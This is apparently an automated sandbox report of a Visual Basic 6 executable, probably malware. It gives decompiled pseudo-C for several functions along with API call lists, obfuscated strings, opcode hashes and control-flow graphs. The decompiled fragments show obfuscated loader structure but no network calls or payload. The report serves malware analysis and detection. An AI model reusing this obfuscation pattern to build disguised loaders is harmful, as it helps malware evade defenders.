              • _adj_fdiv_m64.MSVBVM60(?,00000000,00000000,?), ref: 004171B4
              • __vbaFpI4.MSVBVM60(?,?,?,00000000,00000000,?), ref: 004171D3
              • __vbaHresultCheckObj.MSVBVM60(00000000,?,0041046C,000002C0,?,?,?,00000000,?,?,?,00000000,00000000,?), ref: 00417225
              • __vbaStrCmp.MSVBVM60(00411DFC,00411DFC,00000000,00000000,?), ref: 0041723D
              • __vbaNew2.MSVBVM60(004119C8,004183D8,00411DFC,00411DFC,00000000,00000000,?), ref: 0041725D
              • __vbaHresultCheckObj.MSVBVM60(00000000,?,004119B8,0000004C,?,?,?,?,00411DFC,00411DFC,00000000,00000000,?), ref: 004172A1
              • __vbaChkstk.MSVBVM60(?,?,?,?,?,00411DFC,00411DFC,00000000,00000000,?), ref: 004172CA
              • __vbaHresultCheckObj.MSVBVM60(00000000,?,00411C68,0000001C,?,?,?,?,00411DFC,00411DFC,00000000,00000000,?), ref: 004172FB
              • __vbaObjSet.MSVBVM60(?,?,?,?,?,?,?,?,00411DFC,00411DFC,00000000,00000000,?), ref: 0041731A
              • __vbaFreeObj.MSVBVM60(?,?,?,?,?,?,?,?,00411DFC,00411DFC,00000000,00000000,?), ref: 00417322
              • __vbaVarDup.MSVBVM60(00411DFC,00411DFC,00000000,00000000,?), ref: 0041733B
              • #645.MSVBVM60(?,00000000,00411DFC,00411DFC,00000000,00000000,?), ref: 00417346
              • __vbaStrMove.MSVBVM60(?,00000000,00411DFC,00411DFC,00000000,00000000,?), ref: 00417350
              • __vbaFreeVar.MSVBVM60(?,00000000,00411DFC,00411DFC,00000000,00000000,?), ref: 00417358
              • __vbaFreeStr.MSVBVM60(00417399,?,00000000,00411DFC,00411DFC,00000000,00000000,?), ref: 0041738B
              • __vbaFreeObj.MSVBVM60(00417399,?,00000000,00411DFC,00411DFC,00000000,00000000,?), ref: 00417393
              Strings
              Memory Dump Source
              • Source File: 00000001.00000002.474162328.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000001.00000002.474147086.0000000000400000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.474224879.0000000000418000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.474240187.000000000041A000.00000002.00020000.sdmp Download File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_400000_udmugning.jbxd
              Yara matches
              Similarity
              • API ID: __vba$Free$CheckHresult$ChkstkMove$#645#667New2_adj_fdiv_m64
              • String ID: Colmars8$tmp$u
              • API String ID: 4120384274-4136535519
              • Opcode ID: 0c37216c41774f01ef50b150ca5628665d63e0355dff38600600642bb4883fc0
              • Instruction ID: 57934a55177bb2a5e619116ba8248f28df3a10130877ec5437f4be91bd0d52d0
              • Opcode Fuzzy Hash: 0c37216c41774f01ef50b150ca5628665d63e0355dff38600600642bb4883fc0
              • Instruction Fuzzy Hash: 3B712671900209EFDB00EFA1C945BEEBBB5BF04704F14882AF541BB1A1DB795A96DB18
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00415128, Relevance: 35.1, APIs: 16, Strings: 4, Instructions: 135COMMON
              Download Yara Rule

              Control-flow Graph

              C-Code - Quality: 44%
              			E00415128(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				void* _v28;
				intOrPtr _v32;
				char _v36;
				char _v40;
				char _v56;
				intOrPtr _v64;
				char _v72;
				intOrPtr _v80;
				char _v88;
				intOrPtr _v96;
				char _v104;
				intOrPtr _v112;
				char _v120;
				intOrPtr _v128;
				char _v136;
				intOrPtr _v144;
				char _v152;
				char* _v160;
				intOrPtr _v168;
				char* _v268;
				short _v272;
				char* _t61;
				char* _t62;
				char* _t68;
				void* _t95;
				void* _t97;
				intOrPtr _t98;

				_t98 = _t97 - 0xc;
				 *[fs:0x0] = _t98;
				L004016F0();
				_v16 = _t98;
				_v12 = 0x401520;
				_v8 = 0;
				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx,  *[fs:0x0], 0x4016f6, _t95);
				_push(0x54c27c);
				_push(L"bangsternears");
				_t61 =  &_v40;
				_push(_t61);
				L004018D6();
				_push(_t61);
				_push(L"hjlrd");
				_t62 =  &_v36;
				_push(_t62);
				L004018D6();
				_push(_t62);
				_push(0x4c69df);
				_push(0x98e72e79);
				_push(0x8904d3f8); // executed
				E00411584(); // executed
				_v268 = _t62;
				L004018D0();
				_v272 =  ~(0 | _v268 == 0x8904d3f8);
				_push( &_v40);
				_push( &_v36);
				_push(2);
				L004018CA();
				_t68 = _v272;
				if(_t68 != 0) {
					_push(0);
					_push(L"Indpiskedes");
					_push( &_v56);
					L00401918();
					_t68 = 0x10;
					L004016F0();
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_push(0);
					_push(_v32);
					L0040191E();
					L00401912();
				}
				_push(0x79b3bd);
				E004117FC();
				_v268 = _t68;
				L004018D0();
				if(_v268 == 0x750289) {
					_v144 = 0x80020004;
					_v152 = 0xa;
					_v128 = 0x80020004;
					_v136 = 0xa;
					_v112 = 0x80020004;
					_v120 = 0xa;
					_v96 = 0x80020004;
					_v104 = 0xa;
					_v80 = 0x80020004;
					_v88 = 0xa;
					_v64 = 0x80020004;
					_v72 = 0xa;
					_v160 = L"NOSTER";
					_v168 = 8;
					L004018A0();
					_push( &_v152);
					_push( &_v136);
					_push( &_v120);
					_push( &_v104);
					_push( &_v88);
					_push( &_v72);
					_push( &_v56);
					L0040187C();
					L00401882();
					_push( &_v152);
					_push( &_v136);
					_push( &_v120);
					_push( &_v104);
					_push( &_v88);
					_push( &_v72);
					_t68 =  &_v56;
					_push(_t68);
					_push(7);
					L00401942();
				}
				_push(0x41536c);
				L00401924();
				L004018AC();
				return _t68;
			}

































              0x0041512b
              0x0041513a
              0x00415146
              0x0041514e
              0x00415151
              0x00415158
              0x00415167
              0x0041516a
              0x0041516f
              0x00415174
              0x00415177
              0x00415178
              0x0041517d
              0x0041517e
              0x00415183
              0x00415186
              0x00415187
              0x0041518c
              0x0041518d
              0x00415192
              0x00415197
              0x0041519c
              0x004151a1
              0x004151a7
              0x004151bd
              0x004151c7
              0x004151cb
              0x004151cc
              0x004151ce
              0x004151d6
              0x004151df
              0x004151e1
              0x004151e3
              0x004151eb
              0x004151ec
              0x004151f3
              0x004151f4
              0x004151fe
              0x004151ff
              0x00415200
              0x00415201
              0x00415202
              0x00415204
              0x00415207
              0x0041520f
              0x0041520f
              0x00415214
              0x00415219
              0x0041521e
              0x00415224
              0x00415233
              0x00415239
              0x00415243
              0x0041524d
              0x00415254
              0x0041525e
              0x00415265
              0x0041526c
              0x00415273
              0x0041527a
              0x00415281
              0x00415288
              0x0041528f
              0x00415296
              0x004152a0
              0x004152b3
              0x004152be
              0x004152c5
              0x004152c9
              0x004152cd
              0x004152d1
              0x004152d5
              0x004152d9
              0x004152da
              0x004152e4
              0x004152ef
              0x004152f6
              0x004152fa
              0x004152fe
              0x00415302
              0x00415306
              0x00415307
              0x0041530a
              0x0041530b
              0x0041530d
              0x00415312
              0x00415315
              0x0041535e
              0x00415366
              0x0041536b

              APIs
              • __vbaChkstk.MSVBVM60(?,004016F6), ref: 00415146
              • __vbaStrToAnsi.MSVBVM60(0054C27C,bangsternears,0054C27C,?,?,?,?,004016F6), ref: 00415178
              • __vbaStrToAnsi.MSVBVM60(?,hjlrd,00000000,0054C27C,bangsternears,0054C27C,?,?,?,?,004016F6), ref: 00415187
              • __vbaSetSystemError.MSVBVM60(8904D3F8,98E72E79,004C69DF,00000000,?,hjlrd,00000000,0054C27C,bangsternears,0054C27C,?,?,?,?,004016F6), ref: 004151A7
              • __vbaFreeStrList.MSVBVM60(00000002,?,0054C27C), ref: 004151CE
              • #716.MSVBVM60(?,Indpiskedes,00000000,?,?,004016F6), ref: 004151EC
              • __vbaChkstk.MSVBVM60(?,Indpiskedes,00000000,?,?,004016F6), ref: 004151F4
              • __vbaLateIdSt.MSVBVM60(00000000,00000000,?,Indpiskedes,00000000,?,?,004016F6), ref: 00415207
              • __vbaFreeVar.MSVBVM60(00000000,00000000,?,Indpiskedes,00000000,?,?,004016F6), ref: 0041520F
              • __vbaSetSystemError.MSVBVM60(0079B3BD,?,?,004016F6), ref: 00415224
              • __vbaVarDup.MSVBVM60 ref: 004152B3
              • #596.MSVBVM60(?,0000000A,0000000A,0000000A,0000000A,0000000A,0000000A), ref: 004152DA
              • __vbaStrMove.MSVBVM60(?,0000000A,0000000A,0000000A,0000000A,0000000A,0000000A), ref: 004152E4
              • __vbaFreeVarList.MSVBVM60(00000007,?,0000000A,0000000A,0000000A,0000000A,0000000A,0000000A,?,0000000A,0000000A,0000000A,0000000A,0000000A,0000000A), ref: 0041530D
              • __vbaFreeStr.MSVBVM60(0041536C), ref: 0041535E
              • __vbaFreeObj.MSVBVM60(0041536C), ref: 00415366
              Strings
              Memory Dump Source
              • Source File: 00000001.00000002.474162328.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000001.00000002.474147086.0000000000400000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.474224879.0000000000418000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.474240187.000000000041A000.00000002.00020000.sdmp Download File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_400000_udmugning.jbxd
              Yara matches
              Similarity
              • API ID: __vba$Free$AnsiChkstkErrorListSystem$#596#716LateMove
              • String ID: Indpiskedes$NOSTER$bangsternears$hjlrd
              • API String ID: 2424355990-1043710842
              • Opcode ID: 8c389094062ad298447ff96c20403240ece2b1d9649c1c8333a47673adb2ef77
              • Instruction ID: 0a1195444e2dd1c2fa63dd5947b2ea8192b07ec048cf67a3b4f27340c88c7991
              • Opcode Fuzzy Hash: 8c389094062ad298447ff96c20403240ece2b1d9649c1c8333a47673adb2ef77
              • Instruction Fuzzy Hash: 59510CB2D4020CAADB11EFA1C945BDEB7B8EF04704F20806AF205B7191DBB99B858F55
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00414F28, Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 55COMMON
              Download Yara Rule

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 269 414f28-414fbb __vbaChkstk __vbaVarDup #663 __vbaVarTstNe __vbaFreeVarList 270 414fc7-414fef 269->270 271 414fbd-414fc2 #532 269->271 271->270
              C-Code - Quality: 42%
              			E00414F28(void* __ebx, void* __ecx, void* __edi, void* __esi) {
				intOrPtr _v8;
				intOrPtr _v12;
				long long _v28;
				char _v44;
				char _v60;
				char* _v84;
				intOrPtr _v92;
				intOrPtr _v100;
				char _v108;
				short _v112;
				short _t23;
				short _t26;
				intOrPtr _t35;

				_push(0x4016f6);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t35;
				_push(0x60);
				L004016F0();
				_v12 = _t35;
				_v8 = 0x4014f8;
				_v84 = L"12-12-12";
				_v92 = 8;
				L004018A0();
				_push(1);
				_push(1);
				_push( &_v44);
				_push(0x411b78);
				_push( &_v60); // executed
				L00401822(); // executed
				_v100 = 0xc;
				_v108 = 0x8002;
				_push( &_v60);
				_t23 =  &_v108;
				_push(_t23);
				L00401828();
				_v112 = _t23;
				_push( &_v60);
				_push( &_v44);
				_push(2);
				L00401942();
				_t26 = _v112;
				if(_t26 != 0) {
					_push(L"ankergangs");
					L00401894();
				}
				_v28 =  *0x4014f0;
				asm("wait");
				_push(0x414ff0);
				return _t26;
			}
















              0x00414f2d
              0x00414f38
              0x00414f39
              0x00414f40
              0x00414f43
              0x00414f4b
              0x00414f4e
              0x00414f55
              0x00414f5c
              0x00414f69
              0x00414f6e
              0x00414f70
              0x00414f75
              0x00414f76
              0x00414f7e
              0x00414f7f
              0x00414f84
              0x00414f8b
              0x00414f95
              0x00414f96
              0x00414f99
              0x00414f9a
              0x00414f9f
              0x00414fa6
              0x00414faa
              0x00414fab
              0x00414fad
              0x00414fb5
              0x00414fbb
              0x00414fbd
              0x00414fc2
              0x00414fc2
              0x00414fcd
              0x00414fd0
              0x00414fd1
              0x00000000

              APIs
              • __vbaChkstk.MSVBVM60(?,004016F6), ref: 00414F43
              • __vbaVarDup.MSVBVM60 ref: 00414F69
              • #663.MSVBVM60(?,00411B78,?,00000001,00000001), ref: 00414F7F
              • __vbaVarTstNe.MSVBVM60(00008002,?,?,00411B78,?,00000001,00000001), ref: 00414F9A
              • __vbaFreeVarList.MSVBVM60(00000002,?,?,00008002,?,?,00411B78,?,00000001,00000001), ref: 00414FAD
              • #532.MSVBVM60(ankergangs), ref: 00414FC2
              Strings
              Memory Dump Source
              • Source File: 00000001.00000002.474162328.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000001.00000002.474147086.0000000000400000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.474224879.0000000000418000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.474240187.000000000041A000.00000002.00020000.sdmp Download File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_400000_udmugning.jbxd
              Yara matches
              Similarity
              • API ID: __vba$#532#663ChkstkFreeList
              • String ID: 12-12-12$ankergangs
              • API String ID: 2176192853-2523394133
              • Opcode ID: 98547f241ec83d243e41151769dc5ae8fc6db211085740a45c967b5003c09698
              • Instruction ID: 2f7ea96899015271207f7cc5287487367c199000ce52308971ddcf6c851e598f
              • Opcode Fuzzy Hash: 98547f241ec83d243e41151769dc5ae8fc6db211085740a45c967b5003c09698
              • Instruction Fuzzy Hash: FE11FBB1940248AADB00EBD1D846FEEBBBCBB04B04F40452AF100BA191D7B96585CB69
              Uniqueness

              Uniqueness Score: -1.00%

              Function 004157FD, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 62COMMON
              Download Yara Rule

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 273 4157fd-41584d __vbaChkstk call 41176c __vbaSetSystemError 276 4158c5-4158db 273->276 277 41584f-415856 273->277 279 415870 277->279 280 415858-41586e __vbaNew2 277->280 281 415877-4158a0 __vbaObjSetAddref 279->281 280->281 283 4158a2-4158b7 __vbaHresultCheckObj 281->283 284 4158b9 281->284 285 4158bd-4158c0 __vbaFreeObj 283->285 284->285 285->276
              C-Code - Quality: 57%
              			E004157FD(void* __ebx, void* __ecx, void* __edi, void* __esi, intOrPtr _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				short _v24;
				char _v28;
				signed int _v32;
				intOrPtr* _v36;
				signed int _v40;
				intOrPtr* _v48;
				signed int _v52;
				signed int _t24;
				char* _t27;
				intOrPtr _t37;

				_push(0x4016f6);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t37;
				_t24 = 0x20;
				L004016F0();
				_v12 = _t37;
				_v8 = 0x401560;
				_push(0x3090b5);
				_push(0x8904d3f8);
				_push(0x8904d3f8); // executed
				E0041176C(); // executed
				_v32 = _t24;
				L004018D0();
				if(_v32 == 0x2ab3a6) {
					if( *0x4183d8 != 0) {
						_v48 = 0x4183d8;
					} else {
						_push(0x4183d8);
						_push(0x4119c8);
						L004018C4();
						_v48 = 0x4183d8;
					}
					_v36 =  *_v48;
					_t27 =  &_v28;
					L004018BE();
					_t24 =  *((intOrPtr*)( *_v36 + 0x10))(_v36, _t27, _t27, _a4);
					asm("fclex");
					_v40 = _t24;
					if(_v40 >= 0) {
						_v52 = _v52 & 0x00000000;
					} else {
						_push(0x10);
						_push(0x4119b8);
						_push(_v36);
						_push(_v40);
						L00401906();
						_v52 = _t24;
					}
					L004018AC();
				}
				_v24 = 0x3e59;
				_push(0x4158dc);
				return _t24;
			}















              0x00415802
              0x0041580d
              0x0041580e
              0x00415817
              0x00415818
              0x00415820
              0x00415823
              0x0041582a
              0x0041582f
              0x00415834
              0x00415839
              0x0041583e
              0x00415841
              0x0041584d
              0x00415856
              0x00415870
              0x00415858
              0x00415858
              0x0041585d
              0x00415862
              0x00415867
              0x00415867
              0x0041587c
              0x00415882
              0x00415886
              0x00415894
              0x00415897
              0x00415899
              0x004158a0
              0x004158b9
              0x004158a2
              0x004158a2
              0x004158a4
              0x004158a9
              0x004158ac
              0x004158af
              0x004158b4
              0x004158b4
              0x004158c0
              0x004158c0
              0x004158c5
              0x004158cb
              0x00000000

              APIs
              • __vbaChkstk.MSVBVM60(?,004016F6), ref: 00415818
              • __vbaSetSystemError.MSVBVM60(8904D3F8,8904D3F8,003090B5,?,?,?,?,004016F6), ref: 00415841
              • __vbaNew2.MSVBVM60(004119C8,004183D8,8904D3F8,8904D3F8,003090B5,?,?,?,?,004016F6), ref: 00415862
              • __vbaObjSetAddref.MSVBVM60(?,?,8904D3F8,8904D3F8,003090B5,?,?,?,?,004016F6), ref: 00415886
              • __vbaHresultCheckObj.MSVBVM60(00000000,?,004119B8,00000010,?,?,?,?,?,?,004016F6), ref: 004158AF
              • __vbaFreeObj.MSVBVM60(?,?,?,?,?,?,?,?,?,004016F6), ref: 004158C0
              Strings
              Memory Dump Source
              • Source File: 00000001.00000002.474162328.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000001.00000002.474147086.0000000000400000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.474224879.0000000000418000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.474240187.000000000041A000.00000002.00020000.sdmp Download File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_400000_udmugning.jbxd
              Yara matches
              Similarity
              • API ID: __vba$AddrefCheckChkstkErrorFreeHresultNew2System
              • String ID: Y>
              • API String ID: 3092135765-3955353929
              • Opcode ID: 6f9b55f3c691647ba922b19d9242246f109168ccfc0a28563be5b11c525bce18
              • Instruction ID: 7c81a8e4b979e38ea292f0780557a3e110ddb7179b2dba0cf2cdac32af1d8b82
              • Opcode Fuzzy Hash: 6f9b55f3c691647ba922b19d9242246f109168ccfc0a28563be5b11c525bce18
              • Instruction Fuzzy Hash: BD2137B0D10708EFDF00ABA5C806FDEBBB4EB08704F50446AF510B62A1D7B96994DB6D
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00401968, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 131COMMON
              Download Yara Rule

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 286 401968-4019a6 #100 287 4019a8-401a18 286->287 288 401a1c 286->288 287->288 290 401a20-401a27 288->290 291 401a1f 288->291 292 401a29-401a85 290->292 293 401a8a-401a94 290->293 291->290 292->293
              C-Code - Quality: 77%
              			_entry_(signed int __eax, signed int __ebx, signed int* __ecx, void* __edx, signed int __edi, void* __esi) {
				signed int _t26;
				signed char _t28;
				signed char _t29;
				signed char _t30;
				signed char _t31;
				signed char _t34;
				signed int _t38;
				signed int _t39;
				signed int* _t41;
				intOrPtr* _t43;
				intOrPtr* _t44;
				void* _t52;
				intOrPtr* _t59;
				signed int _t60;

				_t45 = __edi;
				_t41 = __ecx;
				_push("VB5!6&*"); // executed
				L00401960(); // executed
				 *__eax =  *__eax + __eax;
				 *__eax =  *__eax + __eax;
				 *__eax =  *__eax + __eax;
				 *__eax =  *__eax ^ __eax;
				 *__eax =  *__eax + __eax;
				 *__eax =  *__eax + __eax;
				 *__eax =  *__eax + __eax;
				 *__eax =  *__eax + __eax;
				 *((intOrPtr*)(__edx - 0x41)) = _t52 - 1;
				asm("popfd");
				_t26 = __eax + 0x838af2ea - 0x66210b;
				 *_t26 =  *_t26 + _t26;
				 *_t26 =  *_t26 + _t26;
				 *__ecx =  *__ecx + _t26;
				 *_t26 =  *_t26 + _t26;
				 *__ecx =  *__ecx + _t26;
				_push(es);
				_push(_t26);
				_t27 = __ebx;
				_t38 = _t26;
				_t43 = __edx +  *((intOrPtr*)(__esi + 0x65));
				_t59 = _t43;
				if(_t59 < 0) {
					if (_t59 >= 0) goto L2;
					_t31 = __ebx & 0x00000002;
					 *_t31 =  *_t31 + _t31;
					 *_t31 =  *_t31 + _t31;
					 *_t31 =  *_t31 ^ _t31;
					_push(_t38);
					_t43 = _t43 - 1;
					asm("lodsd");
					asm("stc");
					_t39 = _t31 | 0x00000079;
					_t34 = _t38 | _t39;
					_t41 = 0x73;
					 *(_t43 + 0x5ceadead) =  *(_t43 + 0x5ceadead) ^ __edi;
					 *0xaaf3c737 = _t34;
					asm("movsd");
					 *_t43 =  *_t43 + _t39;
					_t45 = __edi;
					asm("lodsd");
					asm("stosb");
					 *0xFFFFFFFF80015E20 =  *((intOrPtr*)(0xffffffff80015e20)) + 0x80015e4d;
					_t27 = _t39 ^  *0xFFFFFFFFB711CFD9;
					_t38 = 0x80015e4d;
					 *_t27 =  *_t27 + _t27;
					 *_t27 =  *_t27 + _t27;
					 *_t27 =  *_t27 + _t27;
					 *_t27 =  *_t27 + _t27;
					 *_t27 =  *_t27 + _t27;
					 *_t27 =  *_t27 + _t27;
					 *_t27 =  *_t27 + _t27;
					 *_t27 =  *_t27 + _t27;
					 *_t27 =  *_t27 + _t27;
					 *_t27 =  *_t27 + _t27;
					 *_t27 =  *_t27 + _t27;
					 *_t27 =  *_t27 + _t27;
					 *_t27 =  *_t27 + _t27;
					 *_t27 =  *_t27 + _t27;
					 *_t27 =  *_t27 + _t27;
					 *_t27 =  *_t27 + _t27;
					 *_t27 =  *_t27 + _t27;
					 *_t27 =  *_t27 + _t27;
					asm("aaa");
					 *0x73 =  *0x73 + 0x80015e4d;
					asm("xlatb");
					 *_t27 =  *_t27 + _t27;
					 *0x80015e4d =  *0x80015e4d + 0x73;
					 *((intOrPtr*)(_t34 + 0x61)) =  *((intOrPtr*)(_t34 + 0x61)) + _t27;
					asm("a16 insb");
					_t60 =  *(_t45 + 0x68) * 0x72656465;
				}
				if (_t60 < 0) goto L4;
				_t28 = _t27 | 0x55000601;
				asm("outsb");
				asm("outsd");
				if(_t28 >= 0) {
					asm("insb");
					 *_t41 =  *_t41 + _t38;
					 *_t28 =  *_t28 + _t28;
					_t44 = _t43 + 1;
					 *_t41 =  *_t41 + _t28;
					_push(cs);
					 *0x746c0000 = _t28;
					 *_t28 =  *_t28 + _t28;
					_push(es);
					 *0x4d420000 = _t28;
					_push(es);
					 *0 = _t28;
					 *_t28 =  *_t28 + _t28;
					if ( *_t28 <= 0) goto L6;
					 *_t28 =  *_t28 + _t28;
					 *_t28 =  *_t28 - _t28;
					 *_t28 =  *_t28 + _t28;
					asm("adc [ecx], al");
					 *_t28 =  *_t28 + _t28;
					_t29 = _t28 ^  *_t41;
					 *_t29 =  *_t29 + _t29;
					 *_t29 =  *_t29 + _t29;
					_t30 = _t29;
					 *_t30 =  *_t30 + _t30;
					 *_t30 =  *_t30 + _t30;
					 *((intOrPtr*)(_t30 + 0xa2)) =  *((intOrPtr*)(_t30 + 0xa2)) + _t44;
					 *_t30 =  *_t30 + _t30;
					 *_t30 =  *_t30 + _t30;
					 *_t30 =  *_t30 + _t30;
					 *_t30 =  *_t30 + _t30;
					 *_t30 =  *_t30 + _t30;
					 *_t30 =  *_t30 + _t30;
					 *_t30 =  *_t30 + _t30;
					 *_t41 =  *_t41 + _t30;
					cs =  *_t44;
					 *((intOrPtr*)(_t38 + 0x63)) =  *((intOrPtr*)(_t38 + 0x63)) + _t30;
					asm("out dx, eax");
					 *((intOrPtr*)(_t38 - 0x14ffcc04)) =  *((intOrPtr*)(_t38 - 0x14ffcc04)) + _t44;
					_t28 =  *0x7450001a;
					 *0x66b7000 = _t28;
				}
				 *((intOrPtr*)(_t45 + 0x6c)) =  *((intOrPtr*)(_t45 + 0x6c)) + _t38;
				asm("lldt word [ebp-0x20ff395c]");
				return _t28;
			}

















              0x00401968
              0x00401968
              0x00401968
              0x0040196d
              0x00401972
              0x00401974
              0x00401976
              0x00401978
              0x0040197a
              0x0040197e
              0x00401980
              0x00401982
              0x0040198c
              0x0040198f
              0x00401990
              0x00401995
              0x00401997
              0x00401999
              0x0040199b
              0x0040199d
              0x004019a0
              0x004019a1
              0x004019a2
              0x004019a2
              0x004019a3
              0x004019a3
              0x004019a6
              0x004019a8
              0x004019aa
              0x004019ac
              0x004019ae
              0x004019b2
              0x004019b6
              0x004019bc
              0x004019bd
              0x004019be
              0x004019bf
              0x004019c0
              0x004019c2
              0x004019c6
              0x004019cd
              0x004019d3
              0x004019d4
              0x004019d6
              0x004019d7
              0x004019e0
              0x004019e1
              0x004019e4
              0x004019e4
              0x004019e5
              0x004019e7
              0x004019e9
              0x004019eb
              0x004019ed
              0x004019ef
              0x004019f1
              0x004019f3
              0x004019f5
              0x004019f7
              0x004019f9
              0x004019fb
              0x004019fd
              0x004019ff
              0x00401a01
              0x00401a03
              0x00401a05
              0x00401a07
              0x00401a09
              0x00401a0c
              0x00401a0e
              0x00401a0f
              0x00401a11
              0x00401a13
              0x00401a16
              0x00401a18
              0x00401a18
              0x00401a1c
              0x00401a20
              0x00401a25
              0x00401a26
              0x00401a27
              0x00401a29
              0x00401a2a
              0x00401a2c
              0x00401a2e
              0x00401a2f
              0x00401a31
              0x00401a32
              0x00401a37
              0x00401a39
              0x00401a3a
              0x00401a3f
              0x00401a40
              0x00401a45
              0x00401a47
              0x00401a49
              0x00401a4b
              0x00401a4d
              0x00401a4f
              0x00401a51
              0x00401a53
              0x00401a55
              0x00401a57
              0x00401a59
              0x00401a5b
              0x00401a5d
              0x00401a5e
              0x00401a64
              0x00401a66
              0x00401a68
              0x00401a6a
              0x00401a6c
              0x00401a6e
              0x00401a70
              0x00401a72
              0x00401a74
              0x00401a76
              0x00401a79
              0x00401a7a
              0x00401a80
              0x00401a85
              0x00401a85
              0x00401a8a
              0x00401a8d
              0x00401a94

              APIs
              Strings
              Memory Dump Source
              • Source File: 00000001.00000002.474162328.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000001.00000002.474147086.0000000000400000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.474224879.0000000000418000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.474240187.000000000041A000.00000002.00020000.sdmp Download File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_400000_udmugning.jbxd
              Yara matches
              Similarity
              • API ID: #100
              • String ID: VB5!6&*
              • API String ID: 1341478452-3593831657
              • Opcode ID: 4a6d806533ef4563fc73eb003cfb689a4ede82dd19cc67b2d08cc9057cabd820
              • Instruction ID: 8e2cda6a4cacb956b98a0c447ed7a57d059dab1353a545682fac0c8b93d20b95
              • Opcode Fuzzy Hash: 4a6d806533ef4563fc73eb003cfb689a4ede82dd19cc67b2d08cc9057cabd820
              • Instruction Fuzzy Hash: AF4120A698E3C15FC7038B7499252827FB1AE1321471A80EBC4C1CF1A3D229584ACBA6
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00411544, Relevance: .0, Instructions: 8COMMON
              Download Yara Rule

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 295 411544-41154b 296 41154d 295->296 297 41154f-411554 295->297 296->297 298 41155b 297->298 298->298
              Memory Dump Source
              • Source File: 00000001.00000002.474162328.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000001.00000002.474147086.0000000000400000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.474224879.0000000000418000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.474240187.000000000041A000.00000002.00020000.sdmp Download File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_400000_udmugning.jbxd
              Yara matches
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: bb0ce0992e793f3ca85018370d11c4600a3c488a3898e6333ff6b9a4ca2b58c9
              • Instruction ID: f4bae3e603ffd16fe7b59aa53fd1c7311dff9264558be06367371411c26732a9
              • Opcode Fuzzy Hash: bb0ce0992e793f3ca85018370d11c4600a3c488a3898e6333ff6b9a4ca2b58c9
              • Instruction Fuzzy Hash: 42B012303C4001FA530043EC9C018B023C293807C03288C33F912C21B0DE28CD40852E
              Uniqueness

              Uniqueness Score: -1.00%

              Function 0041176C, Relevance: .0, Instructions: 8COMMON
              Download Yara Rule

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 303 41176c-411773 304 411775 303->304 305 411777-41177c 303->305 304->305 306 411783 305->306 306->306
              Memory Dump Source
              • Source File: 00000001.00000002.474162328.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000001.00000002.474147086.0000000000400000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.474224879.0000000000418000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.474240187.000000000041A000.00000002.00020000.sdmp Download File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_400000_udmugning.jbxd
              Yara matches
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: d824e8ab012752ac8d0cb914cb0495b0341a8202738e3f7e82e9ed6a04f5514b
              • Instruction ID: 9583d844772de6856c22ab79e9976f079a189f263a6cef00b3ab53c58f9b956a
              • Opcode Fuzzy Hash: d824e8ab012752ac8d0cb914cb0495b0341a8202738e3f7e82e9ed6a04f5514b
              • Instruction Fuzzy Hash: 94B012303C40459A970083948C464E46180A3407803244C33FA32C23F0DB2CCC44852D
              Uniqueness

              Uniqueness Score: -1.00%

              Function 004117FC, Relevance: .0, Instructions: 8COMMON
              Download Yara Rule

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 307 4117fc-411803 308 411805 307->308 309 411807-41180c 307->309 308->309 310 411813 309->310 310->310
              Memory Dump Source
              • Source File: 00000001.00000002.474162328.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
